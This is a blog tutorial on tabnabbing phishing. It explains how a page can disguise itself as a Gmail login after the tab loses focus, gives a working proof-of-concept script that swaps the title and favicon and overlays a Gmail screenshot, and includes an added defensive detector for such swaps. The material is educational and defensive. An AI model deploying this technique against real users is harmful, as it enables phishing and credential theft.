HACKING - Tabnabbing: A New Type of Phishing Attack

Hey guys, this time I came up with the concept of hacking. I have been into ethical hacking for a long time and I love it (FYI: I don't do illegal hacking). This tutorial is for educational purposes only, to bring awareness, and is not intended to encourage hacking.

OK, before going deep into the experiment, I will first tell you what phishing actually is.

What is Phishing?

Phishing is one of the ways of hacking. It is the act of attempting to acquire information such as usernames, passwords, and credit card details from users through a fake webpage (Facebook, Gmail, bank, etc.).

Earlier, hackers used to send links to fake pages hosted on their own web server accounts. When users clicked such a link, the fake page opened, looking exactly like the original login page. When they entered their login credentials in that fake page, the hackers got those details.

But due to growing awareness about hacking in recent days, people are suspicious of links that are not familiar, so phishing became very difficult for hackers.
So they came up with the latest phishing technique, also known as TAB NABBING (coined by Aza Raskin).

What is TAB NABBING?

To describe it, I will take the example of the Gmail login page.

- A user navigates to your normal looking site.

- You detect when the page has lost its focus and hasn’t been interacted with for a while.

- Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like.

This can all be done with just a little bit of JavaScript that takes place instantly.
As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open.
When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in.
After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail.
Because they were never logged out in the first place, it will appear as if the login was successful.
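
Seen from the defender's side, the steps above leave a recognisable trace: the title and favicon change while the tab is unfocused, and the new favicon comes from a different host than the page. The following detector is an added example, not code from the original post or from Aza Raskin; the event-log format, the function names and the blog.example / chat.example hosts are assumptions made for the illustration.

```javascript
// Added example. Event format is an assumption: what an extension could log from
// focus/blur handlers plus a MutationObserver on <title> and <link rel="icon">.
function hostOf(url, base) {
  try { return new URL(url, base).host; } catch (e) { return null; }
}

function detectTabnabbing(pageUrl, events) {
  const pageHost = hostOf(pageUrl);
  const current = { title: null, favicon: null };
  let snapshot = null; // title/favicon at the moment focus was lost
  const findings = [];
  for (const ev of events) {
    if (ev.type === "title") current.title = ev.value;
    else if (ev.type === "favicon") current.favicon = ev.value;
    else if (ev.type === "blur") snapshot = { ...current, t: ev.t };
    else if (ev.type === "focus" && snapshot) {
      const titleChanged = current.title !== snapshot.title;
      const iconChanged = current.favicon !== snapshot.favicon;
      const iconHost = hostOf(current.favicon, pageUrl);
      const foreignIcon = iconChanged && iconHost !== null && iconHost !== pageHost;
      // A title change alone is normal (unread counters), so require the icon swap too.
      if (iconChanged && (titleChanged || foreignIcon)) {
        findings.push({ page: pageHost, awayMs: ev.t - snapshot.t,
                        title: current.title, iconHost, titleChanged, foreignIcon });
      }
      snapshot = null;
    }
  }
  return findings;
}

// Constructed sample logs (t in milliseconds); blog.example and chat.example are placeholders.
const swappedTab = [
  { t: 0, type: "title", value: "Weekend recipes" },
  { t: 0, type: "favicon", value: "/favicon.ico" },
  { t: 1000, type: "blur" },
  { t: 6000, type: "title", value: "Gmail: Email from Google" },
  { t: 6000, type: "favicon", value: "https://mail.google.com/favicon.ico" },
  { t: 90000, type: "focus" },
];
const unreadCounter = [
  { t: 0, type: "title", value: "Chat" },
  { t: 0, type: "favicon", value: "/favicon.ico" },
  { t: 1000, type: "blur" },
  { t: 4000, type: "title", value: "(1) Chat" },
  { t: 9000, type: "focus" },
];
console.log(detectTabnabbing("https://blog.example/post", swappedTab));
console.log(detectTabnabbing("https://chat.example/", unreadCounter));
```

The first log is flagged once (title and icon both swapped while the tab was away for 89 seconds); the unread-counter log produces no finding.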

So the fake page looks like this:

[Image: gmail]

For experimenting, I am providing the code for this. All you have to do is copy the code into Notepad, save it with a name like Demo.html, open the page in a browser (Google Chrome is best), then open a new tab, wait for 5 or more seconds, and come back to the same page.
Magic!!!
It will be loaded with the Gmail page (actually an image).

Code:

<html>
<head>
<script>
/*Copyright (c) 2010 Aza Raskin,Permission is hereby granted,free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.*/

(function(){

  var TIMER = null;
  var HAS_SWITCHED = false;

  // Events
  // Start a 5-second countdown when the window loses focus.
  window.onblur = function(){
    TIMER = setTimeout(changeItUp, 5000);
  };

  // Cancel the countdown if the user comes back before it fires.
  window.onfocus = function(){
    if(TIMER) clearTimeout(TIMER);
  };

  // Utils
  function setTitle(text){ document.title = text; }

  // This favicon object rewritten from:
  // Favicon.js – Change favicon dynamically [http://ajaxify.com/run/favicon].
  // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera.

  var favicon = {
    docHead: document.getElementsByTagName("head")[0],
    set: function(url){
      this.addLink(url);
    },

    addLink: function(iconURL) {
      var link = document.createElement("link");
      link.type = "image/x-icon";
      link.rel = "shortcut icon";
      link.href = iconURL;
      this.removeLinkIfExists();
      this.docHead.appendChild(link);
    },

    removeLinkIfExists: function() {
      var links = this.docHead.getElementsByTagName("link");
      for (var i=0; i<links.length; i++) {
        var link = links[i];
        if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
          this.docHead.removeChild(link);
          return; // Assuming only one match at most.
        }
      }
    },

    get: function() {
      var links = this.docHead.getElementsByTagName("link");
      for (var i=0; i<links.length; i++) {
        var link = links[i];
        if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
          return link.href;
        }
      }
    }
  };

  // Cover the whole page with a white layer showing the screenshot image.
  function createShield(){
    var div = document.createElement("div");
    div.style.position = "fixed";
    div.style.top = 0;
    div.style.left = 0;
    div.style.backgroundColor = "white";
    div.style.width = "100%";
    div.style.height = "100%";
    div.style.textAlign = "center";
    document.body.style.overflow = "hidden";

    var img = document.createElement("img");
    img.style.paddingTop = "15px";
    img.src = "https://hemanthtech.files.wordpress.com/2012/12/gmail.png";

    var oldTitle = document.title;
    var oldFavicon = favicon.get() || "/favicon.ico";

    div.appendChild(img);
    document.body.appendChild(div);

    // Clicking the image removes the layer and restores the original title and favicon.
    img.onclick = function(){
      div.parentNode.removeChild(div);
      document.body.style.overflow = "auto";
      setTitle(oldTitle);
      favicon.set(oldFavicon);
    };
  }

  // Runs once, after the page has been out of focus for 5 seconds.
  function changeItUp(){
    if( HAS_SWITCHED == false ){
      createShield("https://mail.google.com");
      setTitle( "Gmail: Email from Google");
      favicon.set("https://mail.google.com/favicon.ico");
      HAS_SWITCHED = true;
    }
  }

})();

</script>

</head>
<body><h1>Hemanth Chalumuri</h1><p id="demo">Now open a new tab,come back to this page again after 5 seconds</p></body>
</html>

Kool, isn't it??

Try this and you will get a good idea about phishing. If you have any doubts, feel free to contact me.
